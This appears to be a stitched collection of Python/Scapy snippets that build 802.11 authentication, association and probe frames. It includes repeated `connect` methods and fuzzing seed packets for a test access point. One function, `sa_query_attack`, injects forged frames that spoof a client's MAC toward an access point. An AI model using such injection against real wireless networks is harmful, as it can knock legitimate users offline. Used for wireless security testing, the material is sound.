def asso_frame_blueprint(self, ap, cl):
    """
    Build an association-request frame addressed from ``cl`` to ``ap``.

    The capability field is copied out of the stored beacon
    (``self.beacon``), and the SSID (ID 0), supported-rates (ID 1) and
    RSN (ID 48) elements are pulled from
    ``self.enumerate_asso_fields(self.beacon)``, which must be indexable by
    element ID and yield mappings carrying 'ID', 'len' and 'info'. The
    lookup raises if any of those three IDs is absent.

    Returns the RadioTap / Dot11 / Dot11AssoReq / Dot11Elt chain; nothing
    is transmitted here.
    """
    beacon_cap = self.beacon.sprintf("{Dot11Beacon:%Dot11Beacon.cap%}")
    elements = self.enumerate_asso_fields(self.beacon)
    frame = RadioTap() / Dot11(addr1=ap, addr2=cl, addr3=ap)
    frame = frame / Dot11AssoReq(cap=beacon_cap, listen_interval=3)
    # Elements are appended in the same order as before: SSID, rates, RSN.
    for element_id in (0, 1, 48):
        ie = elements[element_id]
        frame = frame / Dot11Elt(ID=ie['ID'], len=ie['len'], info=ie['info'])
    return frame
def sa_query_attack(interface, ap, sta):
    """
    Inject two management frames through ``interface.inject``, sourced from
    ``sta.mac_addr`` and addressed to ``ap.bssid`` (DA and BSSID): an
    open-system authentication request (algo 0, seqnum 1, status 0) and then
    an association request whose RSN element advertises CCMP, PSK and the
    MFP-capable bit. Returns nothing.

    ``ap`` must expose ``bssid`` and ``sta`` must expose ``mac_addr``.
    The RSN element is assembled from text literals; which bytes actually
    reach the wire depends on how the running Python/Scapy version encodes
    such strings — verify with a capture before trusting the frame.
    """
    # Frame 1: open-system authentication request.
    pkt = RadioTap() / Dot11(addr1=ap.bssid, addr2=sta.mac_addr, addr3=ap.bssid) / \
        Dot11Auth(algo=0, seqnum=0x0001, status=0x0000)
    interface.inject(pkt)
    # Frame 2: association request carrying SSID, rates and the RSN element.
    pkt = RadioTap() / Dot11(addr1=ap.bssid, addr2=sta.mac_addr, addr3=ap.bssid) / \
        Dot11AssoReq(cap=0x3104, listen_interval=0x0001) / Dot11Elt(ID=0, info="Wireless Attack Testbed") / \
        Dot11EltRates() / Dot11Elt(ID='RSNinfo', info=(
            '\x01\x00'          # RSN Version 1
            '\x00\x0f\xac\x04'  # Group Cipher Suite : 00-0f-ac CCMP
            '\x01\x00'          # Pairwise Cipher Suite count = 1 (suite follows)
            '\x00\x0f\xac\x04'  # AES-CCMP pairwise cipher
            '\x01\x00'          # Authentication Key Management Suite count = 1
            '\x00\x0f\xac\x02'  # Pre-Shared Key
            '\x80\x00'))        # RSN Capabilities: MFP capable (0x0080)
    interface.inject(pkt)
def connect(self, essid, rsnInfo=''):
    """
    Connect/Associate with an access point.

    Return codes (the method documents these; only 0, 2, 3, 4 and 5 are
    produced by this body):
        -1: Already Connected
         0: No Error
         1: Failed To Get Probe Response
         2: Failed To Get Authentication Response
         3: Failed To Get Association Response
         4: Authentication Request Received Fail Response
         5: Association Request Received Fail Response

    ``rsnInfo`` is appended verbatim to the association request. ``None``
    means "look it up with ``self.get_rsn_information(essid)``" (done after
    the authentication frame has been sent); ``''`` (the default) sends the
    request without an RSN element.

    Replies are read from ``self.lastpacket`` after each
    ``self.__thread_sendp__`` call. On success sets ``self.connected`` and
    resets ``self.sequence`` to 0.
    """
    # Step 1: open-system authentication request (seqnum 1). Despite the
    # "probe request" wording in older copies of this code, the layer sent
    # here is Dot11Auth.
    auth_frame = RadioTap()
    auth_frame /= Dot11(addr1=self.dest_mac, addr2=self.source_mac,
                        addr3=self.dest_mac)
    auth_frame /= Dot11Auth(seqnum=1)
    self.__thread_sendp__(auth_frame)

    if rsnInfo is None:
        # None explicitly means "go get it"; '' means proceed without it.
        rsnInfo = self.get_rsn_information(essid)

    reply = self.lastpacket
    if reply is None or not reply.haslayer(Dot11Auth):
        return 2
    if reply.getlayer(Dot11Auth).status != 0:
        return 4

    # Step 2: association request with SSID, supported rates, extended
    # rates and whatever RSN payload the caller supplied.
    asso_frame = RadioTap()
    asso_frame /= Dot11(addr1=self.bssid, addr2=self.source_mac,
                        addr3=self.bssid, SC=self.__fixSC__(), subtype=0)
    asso_frame /= Dot11AssoReq(cap='ESS+short-preamble+short-slot',
                               listen_interval=10)
    asso_frame /= Dot11Elt(ID=0, info=essid)
    asso_frame /= Dot11Elt(ID=1, info='\x82\x84\x0b\x16\x24\x30\x48\x6c')
    asso_frame /= Dot11Elt(ID=50, info='\x0c\x12\x18\x60')
    asso_frame /= rsnInfo
    self.__thread_sendp__(asso_frame)

    reply = self.lastpacket
    if reply is None or not reply.haslayer(Dot11AssoResp):
        return 3
    if reply.getlayer(Dot11AssoResp).status != 0:
        return 5

    self.connected = True
    self.sequence = 0
    return 0
def send_asso_req(client_mac, bssid, ssid):
    """
    Build an 802.11 association request from ``client_mac`` to ``bssid``.

    Despite the name, nothing is transmitted: the RadioTap / Dot11 /
    Dot11AssoReq / Dot11Elt chain is returned for the caller to send.

    Elements, in order: SSID (ID 0, length taken from ``len(ssid)``),
    supported rates (ID 1), extended rates (ID 50) and two vendor-specific
    elements (ID 221) with OUI 00:50:f2, types 2 and 4. The rate and vendor
    payloads are text literals, so the bytes on the wire depend on the
    Python/Scapy version's string handling.
    """
    frame = RadioTap() / Dot11(
        proto=0,
        FCfield=0,
        subtype=0,
        addr2=client_mac,
        addr3=bssid,
        addr1=bssid,
        type=0,
    )
    frame = frame / Dot11AssoReq(listen_interval=5, cap=12548)
    elements = (
        Dot11Elt(info=ssid, ID=0, len=len(ssid)),
        Dot11Elt(info="\x02\x04\x0b\x16\x0c\x12\x18$", ID=1, len=8),
        Dot11Elt(info="0H`l", ID=50, len=4),
        Dot11Elt(info="\x00P\xf2\x02\x00\x01\x00", ID=221, len=7),
        Dot11Elt(info="\x00P\xf2\x04\x10J\x00\x01\x10\x10:\x00\x01\x02", ID=221, len=14),
    )
    for element in elements:
        frame = frame / element
    return frame
def packetSetting(state):
    """
    Build one of three 802.11 management frames used as a seed packet,
    selected by ``state``.

    state 0 -> probe request, 1 -> authentication request,
    2 -> association request; any other value returns None (testPacket is
    never assigned). States 1 and 2 also print "auth"/"asso" to stdout.

    Relies on names not defined in this function: the address constants
    KUAP, wlp1s0 and Broadcast, the RadioTap2 layer, the Scapy Dot11*
    layers and ``codecs``.
    """
    DA = KUAP
    SA = wlp1s0
    BSSId = Broadcast
    testPacket = None
    # Radiotap header shared by all three frames; the present bitmask is
    # written as hi * 2**32 + lo. NOTE(review): Channel_freq=27657 is 0x6c09,
    # i.e. 2412 (0x096c) with the bytes swapped — presumably deliberate for
    # RadioTap2's field encoding; confirm with a capture.
    radiohead = RadioTap2(
        version=0,
        pad=0,
        len=24,
        present=4294967296 * 775946400 + 537395200,
        flags=0,
        DataRate=2,
        Channel_freq=27657,
        Channel_flags=160,
        SSIsignal1=203,
        RX_Flags=0,
        SSIsignal2=203)
    # Probe-request header: broadcast BSSID, SA = our own interface address.
    prbhead = Dot11(type=0,
                    subtype=4,
                    proto=0,
                    FCfield=0,
                    addr1=DA,
                    addr2=SA,
                    addr3=BSSId,
                    SC=288)
    # Auth/assoc frames carry the AP address in all three address fields
    # (DA was already KUAP; only BSSId actually changes here).
    DA = KUAP
    BSSId = KUAP
    authhead = Dot11(type=0,
                     subtype=11,
                     proto=0,
                     FCfield=0,
                     ID=12,
                     addr1=DA,
                     addr2=SA,
                     addr3=BSSId,
                     SC=288)
    authbody = Dot11Auth(algo=0, seqnum=1)
    # NOTE(review): this shadows the builtin hex() for the rest of the
    # function. Each call returns (decoded_bytes, consumed); [0] keeps the bytes.
    hex = codecs.getdecoder("hex_codec")
    # Raw HT capabilities element for the probe request.
    HTprb = hex("2d1a6e1117ff00000000000000000096000100000000000000000000")[0]
    # Vendor-specific WPS element (OUI 00:50:f2, type 4).
    vendorwps = hex(
        "0050f204104a000110103a000100100800023148104700106876989b82e8525788e06f19ccfcd79e105400080000000000000000103c00010310020002000010090002000010120002000010210001201023000120102400012010110001201049000600372a000120"
    )[0]
    # Vendor-specific P2P element (OUI 50:6f:9a, type 9).
    vendorp2p = hex("506f9a0902020025000605005858045101")[0]
    # Probe-request element chain; the raw HT blob is appended as a Raw layer.
    prbelt = Dot11Elt(ID="SSID", info="KUAP") / \
        Dot11Elt(ID="Rates", info='\x02\x04\x0b\x16\x0c\x12\x18\x24') / \
        Dot11Elt(ID="ESRates", info="\x30\x48\x60\x6c") / HTprb / \
        Dot11Elt(ID="vendor", info=vendorwps) / \
        Dot11Elt(ID="vendor", info=vendorp2p)
    # Association variant of the HT capabilities element, plus an extended
    # capabilities element (ID 0x7f).
    HTasso = hex("2d1a661117ff00000000000000000096000100000000000000000000")[0]
    EXC = hex("7f0804000a0200000040")[0]
    assohead = Dot11(type=0,
                     subtype=0,
                     proto=0,
                     FCfield=8,
                     addr1=DA,
                     addr2=SA,
                     addr3=BSSId,
                     ID=315,
                     SC=288)
    # cap=8452 is 0x2104; read little-endian (0x0421) that is
    # ESS + short-preamble + short-slot — presumably Scapy's byte order
    # for this field; confirm.
    assobody = Dot11AssoReq(cap=8452,
                            listen_interval=10)
    assoelt = Dot11Elt(ID="SSID", info="KUAP") / \
        Dot11Elt(ID="Rates", info='\x02\x04\x0b\x16\x0c\x12\x18\x24') / \
        Dot11Elt(ID="ESRates", info="\x30\x48\x60\x6c") / HTasso / EXC / \
        Dot11Elt(ID="vendor", info="\x00\x50\xf2\x02\x00\x01\x00")
    # Full frames. The "except elt len" figures are the author's notes on the
    # header length preceding the element section of each frame.
    prbMutatePacket = radiohead / prbhead / Dot11ProbeReq() / prbelt  # except elt len= 48
    authMutatePacket = radiohead / authhead / authbody  # except elt len= 54
    assoMutatePacket = radiohead / assohead / assobody / assoelt  # except elt len= 52
    if (state == 0):
        testPacket = prbMutatePacket
    elif (state == 1):
        print("auth")
        testPacket = authMutatePacket
    elif (state == 2):
        print("asso")
        testPacket = assoMutatePacket
    return testPacket
def connect(self, essid, rsnInfo=''):
    """
    Connect/Associate with an access point.

    Return codes (only 0, 2, 3, 4 and 5 are produced by this body):
        -1: Already Connected
         0: No Error
         1: Failed To Get Probe Response
         2: Failed To Get Authentication Response
         3: Failed To Get Association Response
         4: Authentication Request Received Fail Response
         5: Association Request Received Fail Response

    ``rsnInfo`` is appended verbatim to the association request. ``None``
    means "look it up with ``self.getRSNInformation(essid)``"; ``''`` (the
    default) sends the request without an RSN element.

    Each request is sent with ``sendp`` on ``self.interface``, bumps
    ``self.sequence``, and is followed by a ``sniff`` bounded by
    ``self.timeout`` whose ``self.__stopfilter__`` leaves the reply in
    ``self.lastpacket``. On success ``self.connected`` is set and
    ``self.sequence`` is reset to 0.
    """
    if rsnInfo is None:
        # None explicitly means "go get it"; '' means proceed without it.
        rsnInfo = self.getRSNInformation(essid)

    # Step 1: authentication request (seqnum 1), then wait for the reply.
    auth_frame = RadioTap()
    auth_frame /= Dot11(addr1=self.dest_mac, addr2=self.source_mac,
                        addr3=self.bssid, SC=self.__unfuckupSC__())
    auth_frame /= Dot11Auth(seqnum=1)
    sendp(auth_frame, iface=self.interface, verbose=False)
    self.sequence += 1
    sniff(iface=self.interface, store=0, timeout=self.timeout,
          stop_filter=self.__stopfilter__)

    reply = self.lastpacket
    if reply is None or not reply.haslayer('Dot11Auth'):
        return 2
    if reply.getlayer('Dot11Auth').status != 0:
        return 4

    # Step 2: association request with SSID, supported rates, extended
    # rates and the caller-supplied RSN payload, then wait for the reply.
    asso_frame = RadioTap()
    asso_frame /= Dot11(addr1=self.bssid, addr2=self.source_mac,
                        addr3=self.bssid, SC=self.__unfuckupSC__(), subtype=0)
    asso_frame /= Dot11AssoReq(cap='ESS+short-preamble+short-slot',
                               listen_interval=10)
    asso_frame /= Dot11Elt(ID=0, info=essid)
    asso_frame /= Dot11Elt(ID=1, info='\x82\x84\x0b\x16\x24\x30\x48\x6c')
    asso_frame /= Dot11Elt(ID=50, info='\x0c\x12\x18\x60')
    asso_frame /= rsnInfo
    sendp(asso_frame, iface=self.interface, verbose=False)
    self.sequence += 1
    sniff(iface=self.interface, store=0, timeout=self.timeout,
          stop_filter=self.__stopfilter__)

    reply = self.lastpacket
    if reply is None or not reply.haslayer(Dot11AssoResp):
        return 3
    if reply.getlayer(Dot11AssoResp).status != 0:
        return 5

    self.connected = True
    self.sequence = 0  # start a fresh sequence-number space once associated
    return 0
def asso_frame_blueprint(self, ap, cl):
    """
    Build the base of an association request from ``cl`` to ``ap`` and let
    ``self.form_asso_layers`` append the information elements.

    The capability field is copied from the stored beacon (``self.beacon``)
    and the element source is ``self.enumerate_asso_fields(self.beacon)``.
    Returns whatever ``form_asso_layers`` returns; nothing is transmitted.
    """
    beacon_cap = self.beacon.sprintf("{Dot11Beacon:%Dot11Beacon.cap%}")
    elements = self.enumerate_asso_fields(self.beacon)
    base = RadioTap()
    base /= Dot11(addr1=ap, addr2=cl, addr3=ap)
    base /= Dot11AssoReq(cap=beacon_cap, listen_interval=3)
    return self.form_asso_layers(elements, base)
# Association-request seed. Relies on names defined elsewhere: hex (a
# hex_codec decoder, not the builtin), DA, wlp1s0, HTasso, radiohead,
# prbhead, prbelt, authhead and authbody.
# Extended capabilities element (ID 0x7f) as raw bytes.
EXC = hex("7f080400000000000040")[0]
# NOTE(review): proto=1 is a non-zero 802.11 protocol-version field, which
# differs from the proto=0 used by the other frame builders — presumably an
# intentional mutation for this seed; confirm.
assohead = Dot11(type=0,
                 subtype=0,
                 proto=1,
                 FCfield=0,
                 addr1=DA,
                 addr2=wlp1s0,
                 addr3=DA,
                 ID=315,
                 SC=80)
assobody = Dot11AssoReq(cap=8452,
                        listen_interval=10)
assoelt = Dot11Elt(ID="SSID",info="KUAP")/\
    Dot11Elt(ID="Rates",info='\x02\x04\x0b\x16\x0c\x12\x18\x24')/\
    Dot11Elt(ID="ESRates",info="\x30\x48\x60\x6c")/HTasso/EXC/\
    Dot11Elt(ID="vendor", info="\x00\x50\xf2\x02\x00\x01\x00")
# Each seed and its *Mutate* alias start out as the same packet object.
prbSeed = prbMutate = radiohead / prbhead / Dot11ProbeReq() / prbelt
authSeed = authMutatePacket = radiohead / authhead / authbody
assoSeed = assoMutatePacket = radiohead / assohead / assobody / assoelt